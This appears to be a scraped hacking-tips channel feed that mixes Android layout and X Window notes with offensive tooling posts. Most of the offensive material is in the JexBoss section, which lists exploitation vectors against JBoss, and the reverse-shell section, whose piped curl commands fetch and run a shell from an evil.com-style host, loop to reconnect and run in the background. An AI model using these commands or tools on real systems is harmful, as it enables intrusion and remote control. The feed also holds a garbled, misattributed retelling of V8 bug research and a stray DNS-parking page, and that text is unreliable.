▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Lets send some gd scripts for beginers
2020 updqated script :You can use setupTermuxArch.bash , to install Arch Linux in Amazon, Android, Chromebook and Windows


𝕀𝕟𝕤𝕥𝕒𝕝𝕝𝕚𝕤𝕒𝕥𝕚𝕠𝕟 & ℝ𝕦𝕟 :

1) git clone https://github.com/SDRausty/TermuxArch

2) cd TermuxArch

3) setupTermuxArch.bash

4) startarch
THats all!
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Five Android layouts: FrameLayout, LinearLayout, AbsoluteLayout, RelativeLayout, and TableLayout: Part 1
>The Android SDK defines multiple layouts to facilitate user design of the UI. The various layout methods are subclasses of the ViewGroup class, and the structure is shown in picture after this chat
twitter.com/UndercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

1) FrameLayout

> FrameLayout, also known as single frame layout, is the simplest layout among the layout methods provided by Android. It specifies a blank area on the screen and fills a single object in the area. For example pictures, text, buttons, etc.

2) Application developers cannot specify specific fill positions for components filled in FrameLayout. By default, these components will be fixed in the upper left corner of the screen, and components placed later will be placed on the previous component to cover and fill, forming a part. Block or block all.

3) Developers can make appropriate modifications to the component location through the component's android: layout_gravity property.

4) An example FrameLayoutDemo demonstrates the layout effect of FrameLayout. There are 4 TextView components in the layout. The first 3 components are placed in the layout by default. The fourth component is placed in the layout after modifying the gravity property

🦑Part of code of the layout file main.xml in the example FrameLayoutDemo is as follows:
Plain Text Copy
<? xml version = "1.0" encoding = "utf-8"?>
<FrameLayout xmlns: android = "http://schemas.android.com/apk/res/android"
android: layout_height = "fill_parent"
android: layout_width = "fill_parent" >

<TextView
android: id = "@ + id / text1"
android: layout_width = "wrap_content"
android: layout_height = "wrap_content"
android: textColor = "# 00ff00"
android: textsize = "1OOdip"
android: text = "@ string / first" />
<TextView
android: id = "@ + id / text2"
android: layout_width = "wrap_content"
android: layout_height = "wrap_content"
android: textColor = "# 00ffff"
android: textsize = "70dip"
android: text = "@ string / second" />
<TextView
android: id = "@ + id / text3"
android: layout_width = "wrap_content"
android: layout_height = "wrap_content"
android: textColor = "# ffOOOO"
.....
...
</ FrameLayout>
among them:
android: layout_width = "wrap_content"
....

🦑 LinearLayout

> LinearLayout, also known as linear layout, should be the most commonly used layout in Android view design. This layout allows the components placed in it to be arranged neatly horizontally or vertically. The specific arrangement is specified by the android: orientation property, and the weight of each component in the layout is set by the weight property.

>The strings.xml file code in the example LinearLayoutDemo is as f ollows:
Plain Text Copy
<? xml version = "1.0" encoding = "UTF-8"?>
<resources>
<string name = "app_name" > LinearLayoutDemo </ string>
<string name = "red" > red </ string>
<string name = "yellow" > yellow </ string
...

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 General X Window Options > commands :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> descriptions of the commands of the X Window System. These commands have a common set of parameters. Instead of listing these parameters in the description of each command, we will list them here.
> General X Window Options

> PARAMETER VALUE
-background
red green sippy

Setting a cyst background
-background color Setting the background color of the window
-bg color Setting the background color of the window
-display
system. server number

Using an X server with a given number (usually 0) on a given system
-fg color Setting the primary color of the window
-fn font Using the specified font
-font font Using the specified font
-foreground color
red green blue

Setting the primary color of the window
-foreground color Setting the primary color of the window
-geometry
width height + x + y

Set window size and location
-geometry widths height Setting window sizes
-geometry + x + y Setting the position of the upper left corner of the window
-height line Setting the window size vertically, in rows
-position x y Setting the position of the upper left corner of the window, in pixels
@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 updated GEF - GDB Enhanced Features for exploit devs & reversers
>GEF (pronounced ʤɛf - "Jeff") is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development. Application developers will also benefit from it, as GEF lifts a great part of regular GDB obscurity, avoiding repeating traditional commands, or bringing out the relevant information from the debugging runtime.
> t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

# via the install script
1) wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh

# manually
2) wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py

3) echo source ~/.gdbinit-gef.py >> ~/.gdbinit
Then just start playing:

4) gdb -q /path/to/my/bin
gef➤ gef help

🦑Features :

A few of GEF features include:

> One single GDB script.

> Entirely OS Agnostic, NO dependencies: GEF is battery-included and is installable in 2 seconds (unlike PwnDBG).

> Fast limiting the number of dependencies and optimizing code to make the commands as fast as possible (unlike PwnDBG).

>Provides a great variety of commands to drastically change your experience in GDB.

>Easily extendable to create other commands by providing more comprehensible layout to GDB Python API.

>Works consistently on both Python2 and Python3.

>Built around an architecture abstraction layer, so all commands work in a ny GDB-supported architecture such as x86-32/64, ARMv5/6/7,
> AARCH64, SPARC, MIPS, PowerPC, etc. (unlike PEDA)

> Suited for real-life apps debugging, exploit development, just as much as CTF (unlike PEDA or PwnDBG

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Windows Exploit Suggeste
> list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported
> twitter.com/Undercodenews

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) On your linux

> git clone https://github.com/bitsadmin/wesng#windows-exploit-suggester---next-generation-wes-ng

2) go dir

> Obtain the latest database of vulnerabilities by executing the command wes.py --update.

3) Use Windows' built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt

4) Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.

5) As the data provided by Microsoft's MSRC feed is frequently incomplete and false positives are reported by wes.py,

6) Additionally, make sure to check the Eliminating false positives page at the Wiki on how to interpret the results. For an overview of all available parameters, check CMDLINE.md.

# top 2020

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑UPDATED Advanced vulnerability scanning with Nmap NSE
> Vulscan is a module which enhances nmap to a vulnerability scanner. The nmap option -sV enables version detection per service which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB.
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) install the files into the following folder of your Nmap installation:

Nmap\scripts\vulscan\*

2) Clone the GitHub repository like this:

git clone https://github.com/scipag/vulscan scipag_vulscan

3) ln -s pwd/scipag_vulscan /usr/share/nmap/scripts/vulscan

4) nmap -sV --script=vulscan/vulscan.nse www.example.com

🦑Single Database Mode
You may execute vulscan with the following argument to use a single database:

--script-args vulscandb=your_own_database
It is also possible to create and reference your own databases. This requires to create a database file, which has the following structure:

<id>;<title>
> Just execute vulscan like you would by refering to one of the pre-delivered databases. Feel free to share your own database and vulnerability connection with me, to add it to the official repository.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Vulnerability Database
There are the following pre-installed databases available at the moment:

> scipvuldb.csv - https://vuldb.com

> cve.csv - https://cve.mitre.org

> securityfocus.csv - https://www.securityfocus.com/bid/

> xforce.csv - https://exchange.xforce.ibmcloud.com/

> expliotdb.csv - https://www.exploit-db.com

> openvas.csv - http://www.openvas.org

> securitytracker.csv - https://www.securitytracker.com (end-of-life)

> osvdb.csv - http://www.osvdb.org (end-of-life)

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Java Deserialization Vulnerabilities) verify and EXploitation Tool
> topic tools :
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications..
twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

A) Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:

1) git clone https://github.com/joaomatosf/jexboss.git

2) cd jexboss

3) pip install -r requires.txt

4) python jexboss.py -h

5) python jexboss.py -host http://target_host:8080

OR:

6) Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip

7) unzip master.zip

8) cd jexboss-master

9) pip install -r requires.txt

10) python jexboss.py -h

11) python jexboss.py -host http://target_host:8080

> If you are using CentOS with Python 2.6, please install Python2.7.

B) Installation example of the Python 2.7 on CentOS using Collections Software scl:

1) yum -y install centos-release-scl

2) yum -y install python27

3) scl enable python27 bash

🦑Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:

1) Download and install Python

2) Download and install Git for Windows
After installing, run the Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
3) > git clone https://github.com/joaomatosf/jexboss.git

4) cd jexboss

5) pip install -r requires.txt

6) python jexboss.py -h

7) python jexboss.py -host http://target_host:8080


🦑 The exploitation vectors are:

/admin-console
tested and working in JBoss versions 5 and 6

/jmx-console
tested and working in JBoss versions 4, 5 and 6

/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6

/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6

Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters

Servlet Deserialization
tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)

Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications

🦑Tested By UndercOde On

> Debian

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Reverse Shell as a Service topic updated
>pinterest.com/Undercode_Testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> clone https://github.com/lukechilds/reverse-shell
1) Listen for connection
On your machine, open up a port and listen on it. You can do this easily with netcat.

> nc -l 1337

2) Execute reverse shell on target
On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.

3) curl https://shell.now.sh/192.168.0.69:1337 | sh

4) Go back to your machine, you should now have a shell prompt.

🦑Hostname

> You can use a hostname instead of an IP.

1) curl https://shell.now.sh/localhost:1337 | sh
Remote connections
Because this is a reverse connection it can punch through firewalls and connect to the internet.

2) You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with.

> curl https://shell.now.sh/evil.com:1337 | sh

3) Reconnecting
By default when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.

while true; do curl https://shell.now.sh/yourip:1337 | sh; done

4) Running as a background process

> Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.

sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Your domain is not pointing to our name servers

Therefore most features (website, e-mail, FTP) will not work. You need to navigate to your domain registrar (the company where you registered your domain) and edit DNS details of your domain. Here are new name servers:

ns1.dns-parking.com
ns2.dns-parking.com

This way, you will be able to take full advantage of all our features. Your domain will display the content uploaded to your account, mail service will be active, you will be able to activate SSL, create subdomains and manage your DNS zone. Domain will become fully functional in a few hours. Global DNS servers have to fetch new domain details first.

In the meantime, use this link to preview your website:
dailycve-com.preview-domain.com
This link will be available for 120h after your account is created

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft finds Google Chrome vulnerability, Google finds Microsoft Edge vulnerability full by underc0de :
>Security is now a powerful difference in picking the right browser. We all use browsers for everyday activities, such as staying in touch with loved ones, editing sensitive private and corporate documents, and even managing our financial assets. A single compromise through a web browser can have disastrous consequences. This does not mean that the browser is also becoming one of the most sophisticated consumer software available, increasing the potential attack surface.
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Find and exploit remote vulnerabilities

> Usually, we do this by discovering memory corruption errors, such as buffer overflows or post-exempt vulnerabilities.

2) As with any web browser, the attack surface is extensive, including the V8 JavaScript interpreter, the Blink DOM engine, and the ium PDF PDF renderer. For this project, we focused on V8 .

3) The bugs we ultimately used for our exploit were discovered through obfuscation. We use the Azure-based fuzzy infrastructure of the Windows Security Assurance team to run ExprGen , an internal JavaScript fuzzer written by the team behind Chakra (our own JavaScript engine). People may have thrown all public fuzzers on V8 ; on the other hand, ExprGen has only operated on Chakra , giving it more opportunities to lead to new bugs.

🦑 1) Recognition error
One disadvantage of obfuscation compared to manual code review is that it is not always immediately clear what causes a given test case to trigger a vulnerability, or unexpected behavior even constitutes a vulnerability.

2) This is especially true for us at OSR; we don't have any experience working with V8 , so little is known about its internal work. In this case, the test cases generated by ExprGen reliably crashed V8 , but not always in the same way, and not in a way that could be easily affected by attackers.

3) Since fuzzers often generate very large and complex code (in this case, nearly 1,500 lines of unreadable JavaScript), the first step is usually to minimize test cases – trimming fat until we leave a small, understandable Code. This is underc0de final conclusion:

>looks weird and doesn't really implement anything, but it is valid JavaScript. All it does is create a weird structured object and then set some of its fields. This should not trigger any strange behavior, but it is. When running this code with D8 , the standalone executable version of V8 is built with git tag 6.1.5534.32 and we will experience a crash

> Looking at the address where the crash occurred ( 0x000002d168004f14 ), we can tell it will not happen in a static module. Therefore, it must be code that is dynamically generated by the V8 Just-In-Time (JIT) compiler. We also see the crash because the rax register is zero.

> looks like a classic zero dereference error, which would be a waiver: usually not exploitable because modern operating systems prevent zero virtual addresses from being mapped

+ Check out picture

> our crash happened before a function call and looked like a JavaScript function dispatcher stub, mainly because the address of v8 :: internal :: Builtin_FunctionPrototypeToString was loaded into a register before the call. Looking at the code located at the function 0x000002d167e84500 , we find that the address 0x000002d167e8455f does contain a call to the RBX instruction, which seems to confirm our suspicion.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

4) This does not produce very useful information.

5) We can see that most of these values ​​are pointers, but that's about it. However, knowing the location of the value (what does it mean a pointer) is useful because it can help us figure out why this value is zero in the first place. Using WinDbg's new " Time Journey Debugging (TTD)" feature, we can place a memory write breakpoint at this location ( baw 8 0000025e`a6845dd0 ), then place an execution breakpoint at the beginning of the function, and finally Rerun backward tracking ( g- ).

6) Interestingly, our memory write breakpoints are not triggered, which means that this memory slot is not initialized in this function, or at least it will not be used. This may be normal, but if we play with test cases, for example by replacing obbc.bca.bcab = 0; line with obbc.bca.bcab = 0xbadc0de; then we start to notice changes in the memory area where our crash values ​​occur

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 ISSUE 2 IN EXPLORET AND CHROME :-Create Crash for browsers :
At this stage of the optimization process, the code looks perfectly reasonable:

1) Allocate a storage block to store the local object obba (node ​​235), and its fields baa and bab are initialized

2) Allocate a memory block to store the local object ob (node ​​259), and its fields are initialized, where ba is initialized with a reference to the previous obba allocation

3) Allocate a storage block to store the local object o (node ​​303), and its fields are initialized

4) Field b of local object o is covered by a reference to object ob (node ​​185)

5) Local object field obba.bab is loaded (nodes 199, 209 and 212)
Call the Object.toString method, passing obba.bab as the first parameter


6) Code compiled in the optimization pipeline at this stage should not appear to exhibit uninitialized local variable behavior, and we assume this is the root cause of the error.

7) Having said that, some aspects of this representation can prove our hypothesis. Looking at nodes 209 and 212 loading obba and obba.bab as function call parameters, we can see that the offsets +24 and +32 correspond to the disassembly of the crash

8) 0x17 and 0x1f are 23 and 31 , respectively . Considering how the value of the V8 tag distinguishes an actual object from an inline integer (SMI), the value of the VORD tag can be applied: if the value intended to indicate that a JavaScript variable has the least significant bit set, it is treated as a pointer to the object, Otherwise it is SMI. Therefore, V8 code is optimized to subtract one from the JavaScript object offset before it is used for dereferencing

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Those tutorials- crash browsers bug for developers, or hacker with little bit experience-

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW CRASH CODES WORKS IN BROWSERS ?
There are two significant differences:

1) The code no longer has the trouble of loading o , and then ob -it is optimized to directly reference ob , probably because the value of the field has never changed

2) The code no longer initializes obba ; as can be seen in the figure, the turbulence grayscale out of node 264, which means that it no longer lives, so it will not be built into the final code

3) Looking at all active node seems to confirm that this field is no longer initialized. As another sanity check, we run d8 in this test case , using the -no-turbo-escape flag to omit this optimization phase: d8 no longer crashes, confirming that this is the problem.
written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁